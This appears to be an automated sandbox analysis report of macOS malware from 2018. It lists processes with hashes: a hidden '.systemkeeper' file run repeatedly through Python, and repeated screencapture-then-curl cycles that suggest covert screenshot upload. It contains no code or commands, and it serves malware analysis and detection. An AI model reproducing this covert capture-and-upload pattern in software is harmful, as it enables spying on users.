Analysis Process: screencapture PID: 599 Parent PID: 563

General

Start time:11:25:03
Start date:12/12/2018
Path:/usr/sbin/screencapture
File size:120496 bytes
MD5 hash:e35ea92c730c1c3a66fc3a14027729aa

Chronological Activities

Analysis Process: bash PID: 604 Parent PID: 563

General

Start time:11:25:03
Start date:12/12/2018
Path:/bin/bash
File size:618448 bytes
MD5 hash:a17c5d0e7f7f4f69c6218066c2a3e1b6

Chronological Activities

Analysis Process: curl PID: 604 Parent PID: 563

General

Start time:11:25:03
Start date:12/12/2018
Path:/usr/bin/curl
File size:185104 bytes
MD5 hash:078cd73f58d3d8f875eed22522ff73f7

Chronological Activities

Analysis Process: bash PID: 605 Parent PID: 563

General

Start time:11:25:09
Start date:12/12/2018
Path:/bin/bash
File size:618448 bytes
MD5 hash:a17c5d0e7f7f4f69c6218066c2a3e1b6

Chronological Activities

Analysis Process: screencapture PID: 605 Parent PID: 563

General

Start time:11:25:09
Start date:12/12/2018
Path:/usr/sbin/screencapture
File size:120496 bytes
MD5 hash:e35ea92c730c1c3a66fc3a14027729aa

Chronological Activities

Analysis Process: bash PID: 606 Parent PID: 563

General

Start time:11:25:09
Start date:12/12/2018
Path:/bin/bash
File size:618448 bytes
MD5 hash:a17c5d0e7f7f4f69c6218066c2a3e1b6

Chronological Activities

Analysis Process: curl PID: 606 Parent PID: 563

General

Start time:11:25:09
Start date:12/12/2018
Path:/usr/bin/curl
File size:185104 bytes
MD5 hash:078cd73f58d3d8f875eed22522ff73f7

Chronological Activities

Analysis Process: bash PID: 612 Parent PID: 563

General

Start time:11:25:15
Start date:12/12/2018
Path:/bin/bash
File size:618448 bytes
MD5 hash:a17c5d0e7f7f4f69c6218066c2a3e1b6

Chronological Activities

Analysis Process: screencapture PID: 612 Parent PID: 563

General

Start time:11:25:15
Start date:12/12/2018
Path:/usr/sbin/screencapture
File size:120496 bytes
MD5 hash:e35ea92c730c1c3a66fc3a14027729aa

Chronological Activities

Analysis Process: bash PID: 613 Parent PID: 563

General

Start time:11:25:16
Start date:12/12/2018
Path:/bin/bash
File size:618448 bytes
MD5 hash:a17c5d0e7f7f4f69c6218066c2a3e1b6

Chronological Activities

Analysis Process: curl PID: 613 Parent PID: 563

General

Start time:11:25:16
Start date:12/12/2018
Path:/usr/bin/curl
File size:185104 bytes
MD5 hash:078cd73f58d3d8f875eed22522ff73f7

Chronological Activities

Analysis Process: bash PID: 614 Parent PID: 563

General

Start time:11:25:21
Start date:12/12/2018
Path:/bin/bash
File size:618448 bytes
MD5 hash:a17c5d0e7f7f4f69c6218066c2a3e1b6

Chronological Activities

Analysis Process: screencapture PID: 614 Parent PID: 563

General

Start time:11:25:21
Start date:12/12/2018
Path:/usr/sbin/screencapture
File size:120496 bytes
MD5 hash:e35ea92c730c1c3a66fc3a14027729aa

Chronological Activities

Analysis Process: bash PID: 615 Parent PID: 563

General

Start time:11:25:22
Start date:12/12/2018
Path:/bin/bash
File size:618448 bytes
MD5 hash:a17c5d0e7f7f4f69c6218066c2a3e1b6

Chronological Activities

Analysis Process: curl PID: 615 Parent PID: 563

General

Start time:11:25:22
Start date:12/12/2018
Path:/usr/bin/curl
File size:185104 bytes
MD5 hash:078cd73f58d3d8f875eed22522ff73f7

Chronological Activities

Analysis Process: bash PID: 621 Parent PID: 563

General

Start time:11:25:28
Start date:12/12/2018
Path:/bin/bash
File size:618448 bytes
MD5 hash:a17c5d0e7f7f4f69c6218066c2a3e1b6

Chronological Activities

Analysis Process: screencapture PID: 621 Parent PID: 563

General

Start time:11:25:28
Start date:12/12/2018
Path:/usr/sbin/screencapture
File size:120496 bytes
MD5 hash:e35ea92c730c1c3a66fc3a14027729aa

Chronological Activities

Analysis Process: bash PID: 622 Parent PID: 563

General

Start time:11:25:28
Start date:12/12/2018
Path:/bin/bash
File size:618448 bytes
MD5 hash:a17c5d0e7f7f4f69c6218066c2a3e1b6

Chronological Activities

Analysis Process: curl PID: 622 Parent PID: 563

General

Start time:11:25:28
Start date:12/12/2018
Path:/usr/bin/curl
File size:185104 bytes
MD5 hash:078cd73f58d3d8f875eed22522ff73f7

Chronological Activities

Analysis Process: bash PID: 628 Parent PID: 563

General

Start time:11:25:34
Start date:12/12/2018
Path:/bin/bash
File size:618448 bytes
MD5 hash:a17c5d0e7f7f4f69c6218066c2a3e1b6

Chronological Activities

Analysis Process: screencapture PID: 628 Parent PID: 563

General

Start time:11:25:34
Start date:12/12/2018
Path:/usr/sbin/screencapture
File size:120496 bytes
MD5 hash:e35ea92c730c1c3a66fc3a14027729aa

Chronological Activities

Analysis Process: bash PID: 629 Parent PID: 563

General

Start time:11:25:34
Start date:12/12/2018
Path:/bin/bash
File size:618448 bytes
MD5 hash:a17c5d0e7f7f4f69c6218066c2a3e1b6

Chronological Activities

Analysis Process: curl PID: 629 Parent PID: 563

General

Start time:11:25:34
Start date:12/12/2018
Path:/usr/bin/curl
File size:185104 bytes
MD5 hash:078cd73f58d3d8f875eed22522ff73f7

Chronological Activities

Analysis Process: bash PID: 630 Parent PID: 563

General

Start time:11:25:41
Start date:12/12/2018
Path:/bin/bash
File size:618448 bytes
MD5 hash:a17c5d0e7f7f4f69c6218066c2a3e1b6

Chronological Activities

Analysis Process: screencapture PID: 630 Parent PID: 563

General

Start time:11:25:41
Start date:12/12/2018
Path:/usr/sbin/screencapture
File size:120496 bytes
MD5 hash:e35ea92c730c1c3a66fc3a14027729aa

Chronological Activities

Analysis Process: bash PID: 631 Parent PID: 563

General

Start time:11:25:41
Start date:12/12/2018
Path:/bin/bash
File size:618448 bytes
MD5 hash:a17c5d0e7f7f4f69c6218066c2a3e1b6

Chronological Activities

Analysis Process: curl PID: 631 Parent PID: 563

General

Start time:11:25:41
Start date:12/12/2018
Path:/usr/bin/curl
File size:185104 bytes
MD5 hash:078cd73f58d3d8f875eed22522ff73f7

Chronological Activities

Analysis Process: bash PID: 637 Parent PID: 563

General

Start time:11:25:47
Start date:12/12/2018
Path:/bin/bash
File size:618448 bytes
MD5 hash:a17c5d0e7f7f4f69c6218066c2a3e1b6

Chronological Activities

Analysis Process: screencapture PID: 637 Parent PID: 563

General

Start time:11:25:47
Start date:12/12/2018
Path:/usr/sbin/screencapture
File size:120496 bytes
MD5 hash:e35ea92c730c1c3a66fc3a14027729aa

Chronological Activities

Analysis Process: bash PID: 638 Parent PID: 563

General

Start time:11:25:47
Start date:12/12/2018
Path:/bin/bash
File size:618448 bytes
MD5 hash:a17c5d0e7f7f4f69c6218066c2a3e1b6

Chronological Activities

Analysis Process: curl PID: 638 Parent PID: 563

General

Start time:11:25:47
Start date:12/12/2018
Path:/usr/bin/curl
File size:185104 bytes
MD5 hash:078cd73f58d3d8f875eed22522ff73f7

Chronological Activities

Analysis Process: bash PID: 639 Parent PID: 563

General

Start time:11:25:53
Start date:12/12/2018
Path:/bin/bash
File size:618448 bytes
MD5 hash:a17c5d0e7f7f4f69c6218066c2a3e1b6

Chronological Activities

Analysis Process: screencapture PID: 639 Parent PID: 563

General

Start time:11:25:53
Start date:12/12/2018
Path:/usr/sbin/screencapture
File size:120496 bytes
MD5 hash:e35ea92c730c1c3a66fc3a14027729aa

Chronological Activities

Analysis Process: bash PID: 640 Parent PID: 563

General

Start time:11:25:53
Start date:12/12/2018
Path:/bin/bash
File size:618448 bytes
MD5 hash:a17c5d0e7f7f4f69c6218066c2a3e1b6

Chronological Activities

Analysis Process: curl PID: 640 Parent PID: 563

General

Start time:11:25:53
Start date:12/12/2018
Path:/usr/bin/curl
File size:185104 bytes
MD5 hash:078cd73f58d3d8f875eed22522ff73f7

Chronological Activities

Analysis Process: bash PID: 646 Parent PID: 563

General

Start time:11:25:59
Start date:12/12/2018
Path:/bin/bash
File size:618448 bytes
MD5 hash:a17c5d0e7f7f4f69c6218066c2a3e1b6

Chronological Activities

Analysis Process: screencapture PID: 646 Parent PID: 563

General

Start time:11:25:59
Start date:12/12/2018
Path:/usr/sbin/screencapture
File size:120496 bytes
MD5 hash:e35ea92c730c1c3a66fc3a14027729aa

Chronological Activities

Analysis Process: bash PID: 647 Parent PID: 563

General

Start time:11:26:00
Start date:12/12/2018
Path:/bin/bash
File size:618448 bytes
MD5 hash:a17c5d0e7f7f4f69c6218066c2a3e1b6

Chronological Activities

Analysis Process: curl PID: 647 Parent PID: 563

General

Start time:11:26:00
Start date:12/12/2018
Path:/usr/bin/curl
File size:185104 bytes
MD5 hash:078cd73f58d3d8f875eed22522ff73f7

Chronological Activities

Analysis Process: bash PID: 649 Parent PID: 563

General

Start time:11:26:06
Start date:12/12/2018
Path:/bin/bash
File size:618448 bytes
MD5 hash:a17c5d0e7f7f4f69c6218066c2a3e1b6

Chronological Activities

Analysis Process: screencapture PID: 649 Parent PID: 563

General

Start time:11:26:06
Start date:12/12/2018
Path:/usr/sbin/screencapture
File size:120496 bytes
MD5 hash:e35ea92c730c1c3a66fc3a14027729aa

Chronological Activities

Analysis Process: bash PID: 654 Parent PID: 563

General

Start time:11:26:06
Start date:12/12/2018
Path:/bin/bash
File size:618448 bytes
MD5 hash:a17c5d0e7f7f4f69c6218066c2a3e1b6

Chronological Activities

Analysis Process: curl PID: 654 Parent PID: 563

General

Start time:11:26:06
Start date:12/12/2018
Path:/usr/bin/curl
File size:185104 bytes
MD5 hash:078cd73f58d3d8f875eed22522ff73f7

Chronological Activities

Analysis Process: bash PID: 655 Parent PID: 563

General

Start time:11:26:12
Start date:12/12/2018
Path:/bin/bash
File size:618448 bytes
MD5 hash:a17c5d0e7f7f4f69c6218066c2a3e1b6

Chronological Activities

Analysis Process: screencapture PID: 655 Parent PID: 563

General

Start time:11:26:12
Start date:12/12/2018
Path:/usr/sbin/screencapture
File size:120496 bytes
MD5 hash:e35ea92c730c1c3a66fc3a14027729aa

Chronological Activities

Analysis Process: bash PID: 656 Parent PID: 563

General

Start time:11:26:12
Start date:12/12/2018
Path:/bin/bash
File size:618448 bytes
MD5 hash:a17c5d0e7f7f4f69c6218066c2a3e1b6

Chronological Activities

Analysis Process: curl PID: 656 Parent PID: 563

General

Start time:11:26:12
Start date:12/12/2018
Path:/usr/bin/curl
File size:185104 bytes
MD5 hash:078cd73f58d3d8f875eed22522ff73f7

Chronological Activities

Analysis Process: bash PID: 662 Parent PID: 563

General

Start time:11:26:18
Start date:12/12/2018
Path:/bin/bash
File size:618448 bytes
MD5 hash:a17c5d0e7f7f4f69c6218066c2a3e1b6

Chronological Activities

Analysis Process: screencapture PID: 662 Parent PID: 563

General

Start time:11:26:18
Start date:12/12/2018
Path:/usr/sbin/screencapture
File size:120496 bytes
MD5 hash:e35ea92c730c1c3a66fc3a14027729aa

Chronological Activities

Analysis Process: bash PID: 663 Parent PID: 563

General

Start time:11:26:19
Start date:12/12/2018
Path:/bin/bash
File size:618448 bytes
MD5 hash:a17c5d0e7f7f4f69c6218066c2a3e1b6

Chronological Activities

Analysis Process: curl PID: 663 Parent PID: 563

General

Start time:11:26:19
Start date:12/12/2018
Path:/usr/bin/curl
File size:185104 bytes
MD5 hash:078cd73f58d3d8f875eed22522ff73f7

Chronological Activities

Analysis Process: bash PID: 664 Parent PID: 563

General

Start time:11:26:25
Start date:12/12/2018
Path:/bin/bash
File size:618448 bytes
MD5 hash:a17c5d0e7f7f4f69c6218066c2a3e1b6

Chronological Activities

Analysis Process: screencapture PID: 664 Parent PID: 563

General

Start time:11:26:25
Start date:12/12/2018
Path:/usr/sbin/screencapture
File size:120496 bytes
MD5 hash:e35ea92c730c1c3a66fc3a14027729aa

Chronological Activities

Analysis Process: bash PID: 665 Parent PID: 563

General

Start time:11:26:25
Start date:12/12/2018
Path:/bin/bash
File size:618448 bytes
MD5 hash:a17c5d0e7f7f4f69c6218066c2a3e1b6

Chronological Activities

Analysis Process: curl PID: 665 Parent PID: 563

General

Start time:11:26:25
Start date:12/12/2018
Path:/usr/bin/curl
File size:185104 bytes
MD5 hash:078cd73f58d3d8f875eed22522ff73f7

Chronological Activities

Analysis Process: bash PID: 671 Parent PID: 563

General

Start time:11:26:31
Start date:12/12/2018
Path:/bin/bash
File size:618448 bytes
MD5 hash:a17c5d0e7f7f4f69c6218066c2a3e1b6

Chronological Activities

Analysis Process: screencapture PID: 671 Parent PID: 563

General

Start time:11:26:31
Start date:12/12/2018
Path:/usr/sbin/screencapture
File size:120496 bytes
MD5 hash:e35ea92c730c1c3a66fc3a14027729aa

Chronological Activities

Analysis Process: bash PID: 672 Parent PID: 563

General

Start time:11:26:31
Start date:12/12/2018
Path:/bin/bash
File size:618448 bytes
MD5 hash:a17c5d0e7f7f4f69c6218066c2a3e1b6

Chronological Activities

Analysis Process: curl PID: 672 Parent PID: 563

General

Start time:11:26:31
Start date:12/12/2018
Path:/usr/bin/curl
File size:185104 bytes
MD5 hash:078cd73f58d3d8f875eed22522ff73f7

Chronological Activities

Analysis Process: bash PID: 678 Parent PID: 563

General

Start time:11:26:37
Start date:12/12/2018
Path:/bin/bash
File size:618448 bytes
MD5 hash:a17c5d0e7f7f4f69c6218066c2a3e1b6

Chronological Activities

Analysis Process: screencapture PID: 678 Parent PID: 563

General

Start time:11:26:37
Start date:12/12/2018
Path:/usr/sbin/screencapture
File size:120496 bytes
MD5 hash:e35ea92c730c1c3a66fc3a14027729aa

Chronological Activities

Analysis Process: bash PID: 679 Parent PID: 563

General

Start time:11:26:37
Start date:12/12/2018
Path:/bin/bash
File size:618448 bytes
MD5 hash:a17c5d0e7f7f4f69c6218066c2a3e1b6

Chronological Activities

Analysis Process: curl PID: 679 Parent PID: 563

General

Start time:11:26:37
Start date:12/12/2018
Path:/usr/bin/curl
File size:185104 bytes
MD5 hash:078cd73f58d3d8f875eed22522ff73f7

Chronological Activities

Analysis Process: bash PID: 568 Parent PID: 567

General

Start time:11:24:40
Start date:12/12/2018
Path:/bin/bash
File size:618448 bytes
MD5 hash:a17c5d0e7f7f4f69c6218066c2a3e1b6

Chronological Activities

Analysis Process: system_profiler PID: 568 Parent PID: 567

General

Start time:11:24:40
Start date:12/12/2018
Path:/usr/sbin/system_profiler
File size:45472 bytes
MD5 hash:28bae8e36d2b8a65b50a54ee327298b8

Chronological Activities

Analysis Process: system_profiler PID: 570 Parent PID: 568

General

Start time:11:24:40
Start date:12/12/2018
Path:/usr/sbin/system_profiler
File size:45472 bytes
MD5 hash:28bae8e36d2b8a65b50a54ee327298b8

Chronological Activities

Analysis Process: bash PID: 569 Parent PID: 567

General

Start time:11:24:40
Start date:12/12/2018
Path:/bin/bash
File size:618448 bytes
MD5 hash:a17c5d0e7f7f4f69c6218066c2a3e1b6

Chronological Activities

Analysis Process: awk PID: 569 Parent PID: 567

General

Start time:11:24:40
Start date:12/12/2018
Path:/usr/bin/awk
File size:112592 bytes
MD5 hash:fa9db7f6c4a0287ceb78a3bd34524ada

Chronological Activities

Analysis Process: xpcproxy PID: 575 Parent PID: 1

General

Start time:11:24:42
Start date:12/12/2018
Path:/usr/libexec/xpcproxy
File size:43488 bytes
MD5 hash:d1bb9a4899f0af921e8188218b20d744

Chronological Activities

Analysis Process: .systemkeeper PID: 575 Parent PID: 1

General

Start time:11:24:42
Start date:12/12/2018
Path:/Users/henry/.system/.systemkeeper
File size:1195 bytes
MD5 hash:4d733d44288f4357c292938f0a18a7e9

Chronological Activities

Analysis Process: Python PID: 575 Parent PID: 1

General

Start time:11:24:42
Start date:12/12/2018
Path:/System/Library/Frameworks/Python.framework/Versions/2.7/Resources/Python.app/Contents/MacOS/Python
File size:51744 bytes
MD5 hash:ba780ab677147d9db60c564ef3f51dd0

Chronological Activities

Analysis Process: Python PID: 577 Parent PID: 575

General

Start time:11:24:44
Start date:12/12/2018
Path:/System/Library/Frameworks/Python.framework/Versions/2.7/Resources/Python.app/Contents/MacOS/Python
File size:51744 bytes
MD5 hash:ba780ab677147d9db60c564ef3f51dd0

Chronological Activities

Analysis Process: sh PID: 577 Parent PID: 575

General

Start time:11:24:44
Start date:12/12/2018
Path:/bin/sh
File size:618512 bytes
MD5 hash:8aa60b22a5d30418a002b340989384dc

Chronological Activities

Analysis Process: sh PID: 579 Parent PID: 577

General

Start time:11:24:44
Start date:12/12/2018
Path:/bin/sh
File size:618512 bytes
MD5 hash:8aa60b22a5d30418a002b340989384dc

Chronological Activities

Analysis Process: ps PID: 579 Parent PID: 577

General

Start time:11:24:44
Start date:12/12/2018
Path:/bin/ps
File size:51280 bytes
MD5 hash:792e18b1417ac1f184680d2423206e4f

Chronological Activities

Analysis Process: sh PID: 582 Parent PID: 577

General

Start time:11:24:44
Start date:12/12/2018
Path:/bin/sh
File size:618512 bytes
MD5 hash:8aa60b22a5d30418a002b340989384dc

Chronological Activities

Analysis Process: grep PID: 582 Parent PID: 577

General

Start time:11:24:44
Start date:12/12/2018
Path:/usr/bin/grep
File size:33936 bytes
MD5 hash:2b3efb273296881708ea2914c612e0eb

Chronological Activities

Analysis Process: sh PID: 583 Parent PID: 577

General

Start time:11:24:44
Start date:12/12/2018
Path:/bin/sh
File size:618512 bytes
MD5 hash:8aa60b22a5d30418a002b340989384dc

Chronological Activities

Analysis Process: grep PID: 583 Parent PID: 577

General

Start time:11:24:44
Start date:12/12/2018
Path:/usr/bin/grep
File size:33936 bytes
MD5 hash:2b3efb273296881708ea2914c612e0eb

Chronological Activities

Analysis Process: xpcproxy PID: 589 Parent PID: 1

General

Start time:11:24:52
Start date:12/12/2018
Path:/usr/libexec/xpcproxy
File size:43488 bytes
MD5 hash:d1bb9a4899f0af921e8188218b20d744

Chronological Activities

Analysis Process: .systemkeeper PID: 589 Parent PID: 1

General

Start time:11:24:52
Start date:12/12/2018
Path:/Users/henry/.system/.systemkeeper
File size:1195 bytes
MD5 hash:4d733d44288f4357c292938f0a18a7e9

Chronological Activities

Analysis Process: Python PID: 589 Parent PID: 1

General

Start time:11:24:52
Start date:12/12/2018
Path:/System/Library/Frameworks/Python.framework/Versions/2.7/Resources/Python.app/Contents/MacOS/Python
File size:51744 bytes
MD5 hash:ba780ab677147d9db60c564ef3f51dd0

Chronological Activities

Analysis Process: Python PID: 590 Parent PID: 589

General

Start time:11:24:52
Start date:12/12/2018
Path:/System/Library/Frameworks/Python.framework/Versions/2.7/Resources/Python.app/Contents/MacOS/Python
File size:51744 bytes
MD5 hash:ba780ab677147d9db60c564ef3f51dd0

Analysis Process: sh PID: 590 Parent PID: 589

General

Start time:11:24:52
Start date:12/12/2018
Path:/bin/sh
File size:618512 bytes
MD5 hash:8aa60b22a5d30418a002b340989384dc

Analysis Process: sh PID: 591 Parent PID: 590

General

Start time:11:24:52
Start date:12/12/2018
Path:/bin/sh
File size:618512 bytes
MD5 hash:8aa60b22a5d30418a002b340989384dc

Analysis Process: ps PID: 591 Parent PID: 590

General

Start time:11:24:52
Start date:12/12/2018
Path:/bin/ps
File size:51280 bytes
MD5 hash:792e18b1417ac1f184680d2423206e4f

Analysis Process: sh PID: 592 Parent PID: 590

General

Start time:11:24:52
Start date:12/12/2018
Path:/bin/sh
File size:618512 bytes
MD5 hash:8aa60b22a5d30418a002b340989384dc

Analysis Process: grep PID: 592 Parent PID: 590

General

Start time:11:24:52
Start date:12/12/2018
Path:/usr/bin/grep
File size:33936 bytes
MD5 hash:2b3efb273296881708ea2914c612e0eb

Analysis Process: sh PID: 593 Parent PID: 590

General

Start time:11:24:52
Start date:12/12/2018
Path:/bin/sh
File size:618512 bytes
MD5 hash:8aa60b22a5d30418a002b340989384dc

Analysis Process: grep PID: 593 Parent PID: 590

General

Start time:11:24:52
Start date:12/12/2018
Path:/usr/bin/grep
File size:33936 bytes
MD5 hash:2b3efb273296881708ea2914c612e0eb

Analysis Process: xpcproxy PID: 598 Parent PID: 1

General

Start time:11:25:03
Start date:12/12/2018
Path:/usr/libexec/xpcproxy
File size:43488 bytes
MD5 hash:d1bb9a4899f0af921e8188218b20d744

Analysis Process: .systemkeeper PID: 598 Parent PID: 1

General

Start time:11:25:03
Start date:12/12/2018
Path:/Users/henry/.system/.systemkeeper
File size:1195 bytes
MD5 hash:4d733d44288f4357c292938f0a18a7e9

Analysis Process: Python PID: 598 Parent PID: 1

General

Start time:11:25:03
Start date:12/12/2018
Path:/System/Library/Frameworks/Python.framework/Versions/2.7/Resources/Python.app/Contents/MacOS/Python
File size:51744 bytes
MD5 hash:ba780ab677147d9db60c564ef3f51dd0

Analysis Process: Python PID: 600 Parent PID: 598

General

Start time:11:25:03
Start date:12/12/2018
Path:/System/Library/Frameworks/Python.framework/Versions/2.7/Resources/Python.app/Contents/MacOS/Python
File size:51744 bytes
MD5 hash:ba780ab677147d9db60c564ef3f51dd0

Analysis Process: sh PID: 600 Parent PID: 598

General

Start time:11:25:03
Start date:12/12/2018
Path:/bin/sh
File size:618512 bytes
MD5 hash:8aa60b22a5d30418a002b340989384dc

Analysis Process: sh PID: 601 Parent PID: 600

General

Start time:11:25:03
Start date:12/12/2018
Path:/bin/sh
File size:618512 bytes
MD5 hash:8aa60b22a5d30418a002b340989384dc

Analysis Process: ps PID: 601 Parent PID: 600

General

Start time:11:25:03
Start date:12/12/2018
Path:/bin/ps
File size:51280 bytes
MD5 hash:792e18b1417ac1f184680d2423206e4f

Analysis Process: sh PID: 602 Parent PID: 600

General

Start time:11:25:03
Start date:12/12/2018
Path:/bin/sh
File size:618512 bytes
MD5 hash:8aa60b22a5d30418a002b340989384dc

Analysis Process: grep PID: 602 Parent PID: 600

General

Start time:11:25:03
Start date:12/12/2018
Path:/usr/bin/grep
File size:33936 bytes
MD5 hash:2b3efb273296881708ea2914c612e0eb

Analysis Process: sh PID: 603 Parent PID: 600

General

Start time:11:25:03
Start date:12/12/2018
Path:/bin/sh
File size:618512 bytes
MD5 hash:8aa60b22a5d30418a002b340989384dc

Analysis Process: grep PID: 603 Parent PID: 600

General

Start time:11:25:03
Start date:12/12/2018
Path:/usr/bin/grep
File size:33936 bytes
MD5 hash:2b3efb273296881708ea2914c612e0eb

Analysis Process: xpcproxy PID: 607 Parent PID: 1

General

Start time:11:25:13
Start date:12/12/2018
Path:/usr/libexec/xpcproxy
File size:43488 bytes
MD5 hash:d1bb9a4899f0af921e8188218b20d744

Analysis Process: .systemkeeper PID: 607 Parent PID: 1

General

Start time:11:25:13
Start date:12/12/2018
Path:/Users/henry/.system/.systemkeeper
File size:1195 bytes
MD5 hash:4d733d44288f4357c292938f0a18a7e9

Analysis Process: Python PID: 607 Parent PID: 1

General

Start time:11:25:13
Start date:12/12/2018
Path:/System/Library/Frameworks/Python.framework/Versions/2.7/Resources/Python.app/Contents/MacOS/Python
File size:51744 bytes
MD5 hash:ba780ab677147d9db60c564ef3f51dd0

Analysis Process: Python PID: 608 Parent PID: 607

General

Start time:11:25:13
Start date:12/12/2018
Path:/System/Library/Frameworks/Python.framework/Versions/2.7/Resources/Python.app/Contents/MacOS/Python
File size:51744 bytes
MD5 hash:ba780ab677147d9db60c564ef3f51dd0

Analysis Process: sh PID: 608 Parent PID: 607

General

Start time:11:25:13
Start date:12/12/2018
Path:/bin/sh
File size:618512 bytes
MD5 hash:8aa60b22a5d30418a002b340989384dc

Analysis Process: sh PID: 609 Parent PID: 608

General

Start time:11:25:13
Start date:12/12/2018
Path:/bin/sh
File size:618512 bytes
MD5 hash:8aa60b22a5d30418a002b340989384dc

Analysis Process: ps PID: 609 Parent PID: 608

General

Start time:11:25:13
Start date:12/12/2018
Path:/bin/ps
File size:51280 bytes
MD5 hash:792e18b1417ac1f184680d2423206e4f

Analysis Process: sh PID: 610 Parent PID: 608

General

Start time:11:25:13
Start date:12/12/2018
Path:/bin/sh
File size:618512 bytes
MD5 hash:8aa60b22a5d30418a002b340989384dc

Analysis Process: grep PID: 610 Parent PID: 608

General

Start time:11:25:13
Start date:12/12/2018
Path:/usr/bin/grep
File size:33936 bytes
MD5 hash:2b3efb273296881708ea2914c612e0eb

Analysis Process: sh PID: 611 Parent PID: 608

General

Start time:11:25:13
Start date:12/12/2018
Path:/bin/sh
File size:618512 bytes
MD5 hash:8aa60b22a5d30418a002b340989384dc

Analysis Process: grep PID: 611 Parent PID: 608

General

Start time:11:25:13
Start date:12/12/2018
Path:/usr/bin/grep
File size:33936 bytes
MD5 hash:2b3efb273296881708ea2914c612e0eb

Analysis Process: xpcproxy PID: 616 Parent PID: 1

General

Start time:11:25:23
Start date:12/12/2018
Path:/usr/libexec/xpcproxy
File size:43488 bytes
MD5 hash:d1bb9a4899f0af921e8188218b20d744

Analysis Process: .systemkeeper PID: 616 Parent PID: 1

General

Start time:11:25:23
Start date:12/12/2018
Path:/Users/henry/.system/.systemkeeper
File size:1195 bytes
MD5 hash:4d733d44288f4357c292938f0a18a7e9

Analysis Process: Python PID: 616 Parent PID: 1

General

Start time:11:25:23
Start date:12/12/2018
Path:/System/Library/Frameworks/Python.framework/Versions/2.7/Resources/Python.app/Contents/MacOS/Python
File size:51744 bytes
MD5 hash:ba780ab677147d9db60c564ef3f51dd0

Analysis Process: Python PID: 617 Parent PID: 616

General

Start time:11:25:24
Start date:12/12/2018
Path:/System/Library/Frameworks/Python.framework/Versions/2.7/Resources/Python.app/Contents/MacOS/Python
File size:51744 bytes
MD5 hash:ba780ab677147d9db60c564ef3f51dd0

Analysis Process: sh PID: 617 Parent PID: 616

General

Start time:11:25:24
Start date:12/12/2018
Path:/bin/sh
File size:618512 bytes
MD5 hash:8aa60b22a5d30418a002b340989384dc

Analysis Process: sh PID: 618 Parent PID: 617

General

Start time:11:25:24
Start date:12/12/2018
Path:/bin/sh
File size:618512 bytes
MD5 hash:8aa60b22a5d30418a002b340989384dc

Analysis Process: ps PID: 618 Parent PID: 617

General

Start time:11:25:24
Start date:12/12/2018
Path:/bin/ps
File size:51280 bytes
MD5 hash:792e18b1417ac1f184680d2423206e4f

Analysis Process: sh PID: 619 Parent PID: 617

General

Start time:11:25:24
Start date:12/12/2018
Path:/bin/sh
File size:618512 bytes
MD5 hash:8aa60b22a5d30418a002b340989384dc

Analysis Process: grep PID: 619 Parent PID: 617

General

Start time:11:25:24
Start date:12/12/2018
Path:/usr/bin/grep
File size:33936 bytes
MD5 hash:2b3efb273296881708ea2914c612e0eb

Analysis Process: sh PID: 620 Parent PID: 617

General

Start time:11:25:24
Start date:12/12/2018
Path:/bin/sh
File size:618512 bytes
MD5 hash:8aa60b22a5d30418a002b340989384dc

Analysis Process: grep PID: 620 Parent PID: 617

General

Start time:11:25:24
Start date:12/12/2018
Path:/usr/bin/grep
File size:33936 bytes
MD5 hash:2b3efb273296881708ea2914c612e0eb

Analysis Process: xpcproxy PID: 623 Parent PID: 1

General

Start time:11:25:34
Start date:12/12/2018
Path:/usr/libexec/xpcproxy
File size:43488 bytes
MD5 hash:d1bb9a4899f0af921e8188218b20d744

Analysis Process: .systemkeeper PID: 623 Parent PID: 1

General

Start time:11:25:34
Start date:12/12/2018
Path:/Users/henry/.system/.systemkeeper
File size:1195 bytes
MD5 hash:4d733d44288f4357c292938f0a18a7e9

Analysis Process: Python PID: 623 Parent PID: 1

General

Start time:11:25:34
Start date:12/12/2018
Path:/System/Library/Frameworks/Python.framework/Versions/2.7/Resources/Python.app/Contents/MacOS/Python
File size:51744 bytes
MD5 hash:ba780ab677147d9db60c564ef3f51dd0

Analysis Process: Python PID: 624 Parent PID: 623

General

Start time:11:25:34
Start date:12/12/2018
Path:/System/Library/Frameworks/Python.framework/Versions/2.7/Resources/Python.app/Contents/MacOS/Python
File size:51744 bytes
MD5 hash:ba780ab677147d9db60c564ef3f51dd0

Analysis Process: sh PID: 624 Parent PID: 623

General

Start time:11:25:34
Start date:12/12/2018
Path:/bin/sh
File size:618512 bytes
MD5 hash:8aa60b22a5d30418a002b340989384dc

Analysis Process: sh PID: 625 Parent PID: 624

General

Start time:11:25:34
Start date:12/12/2018
Path:/bin/sh
File size:618512 bytes
MD5 hash:8aa60b22a5d30418a002b340989384dc

Analysis Process: ps PID: 625 Parent PID: 624

General

Start time:11:25:34
Start date:12/12/2018
Path:/bin/ps
File size:51280 bytes
MD5 hash:792e18b1417ac1f184680d2423206e4f

Analysis Process: sh PID: 626 Parent PID: 624

General

Start time:11:25:34
Start date:12/12/2018
Path:/bin/sh
File size:618512 bytes
MD5 hash:8aa60b22a5d30418a002b340989384dc

Analysis Process: grep PID: 626 Parent PID: 624

General

Start time:11:25:34
Start date:12/12/2018
Path:/usr/bin/grep
File size:33936 bytes
MD5 hash:2b3efb273296881708ea2914c612e0eb

Analysis Process: sh PID: 627 Parent PID: 624

General

Start time:11:25:34
Start date:12/12/2018
Path:/bin/sh
File size:618512 bytes
MD5 hash:8aa60b22a5d30418a002b340989384dc

Analysis Process: grep PID: 627 Parent PID: 624

General

Start time:11:25:34
Start date:12/12/2018
Path:/usr/bin/grep
File size:33936 bytes
MD5 hash:2b3efb273296881708ea2914c612e0eb

Analysis Process: xpcproxy PID: 632 Parent PID: 1

General

Start time:11:25:45
Start date:12/12/2018
Path:/usr/libexec/xpcproxy
File size:43488 bytes
MD5 hash:d1bb9a4899f0af921e8188218b20d744

Analysis Process: .systemkeeper PID: 632 Parent PID: 1

General

Start time:11:25:45
Start date:12/12/2018
Path:/Users/henry/.system/.systemkeeper
File size:1195 bytes
MD5 hash:4d733d44288f4357c292938f0a18a7e9

Analysis Process: Python PID: 632 Parent PID: 1

General

Start time:11:25:45
Start date:12/12/2018
Path:/System/Library/Frameworks/Python.framework/Versions/2.7/Resources/Python.app/Contents/MacOS/Python
File size:51744 bytes
MD5 hash:ba780ab677147d9db60c564ef3f51dd0

Analysis Process: Python PID: 633 Parent PID: 632

General

Start time:11:25:45
Start date:12/12/2018
Path:/System/Library/Frameworks/Python.framework/Versions/2.7/Resources/Python.app/Contents/MacOS/Python
File size:51744 bytes
MD5 hash:ba780ab677147d9db60c564ef3f51dd0

